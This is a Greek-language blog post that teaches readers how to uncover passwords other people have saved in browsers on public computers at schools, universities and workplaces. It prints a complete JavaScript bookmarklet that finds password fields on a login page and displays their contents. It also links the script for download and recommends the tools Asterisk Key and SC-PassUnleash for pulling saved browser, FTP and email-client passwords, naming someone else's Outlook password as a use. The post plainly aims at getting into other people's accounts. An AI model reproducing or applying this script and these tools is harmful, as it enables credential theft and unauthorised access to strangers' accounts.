Αν βρισκόμαστε σε κάποιον δημόσιο υπολογιστή (σχολείο,πανεπιστήμιο,δουλειά κτλ.) είναι πολύ πιθανό να βρούμε κάποιες ιστοσελίδες στις οποίες κάποιος χρήστης νωρίτερα να έχει κάνει login και ο browser να έχει κρατήσει τα στοιχεία του λογαριασμού του.Όμως ακόμα και αν γνωρίζουμε το όνομα του account πως θα δούμε τι κρύβεται πίσω από τα **** του κωδικού του?
Μέθοδος 1
Το μόνο που θα πρέπει να κάνουμε είναι να αντιγράψουμε τον παρακάτω κώδικα στην μπάρα διευθύνσεων του browser μας και ενώ βρισκόμαστε στην ιστοσελίδα με την login φόρμα και με το password σε μορφή ****
Κώδικας:
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert(‘Password not found in ‘ + g + ‘ forms’);}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s=”;if (ej.type==’password’){s=ej.value;if (s!=”){prompt(‘Password found ‘, s)}else{alert(‘Password is blank’)}return true;}}
Το script σε .txt —-> http://uploading.com/files/8b1f3cab/script.txt/
Εικόνα:
Αποκάλυψη κωδικών πίσω από τα ****
Μέθοδος 2
Ένας άλλος τρόπος είναι να κατεβάσουμε το πρόγραμμα Asterisk Key και να το τρέξουμε.Όταν θα βρισκόμαστε στην ιστοσελίδα με το login και ενώ υπάρχει ήδη το password στην φόρμα με την μορφή **** πατάμε στο μενού Show Internet Explorer Passwords
Download: Asterisk Key
Μέθοδος 3
Χρησιμοποιώντας την εφαρμογή SC-PassUnleash.Η εφαρμογή αυτήν δουλεύει μόνο σε συγκεκριμένους FTP και Email Clients αλλά μπορεί να μας φανεί χρήσιμη σε περίπτωση που θέλουμε να βρούμε το email password κάποιου που είναι αποθηκευμένο σε κάποιο client π.χ Outlook.
Εικόνα 2:
Download: SC-PassUnleash
Υποσημείωση:
Το Javascript έχει ανεβεί σε μορφή .txt για να μην υπάρχει πρόβλημα με τον τρόπο που διαχειρίζεται τα “” η wordpress.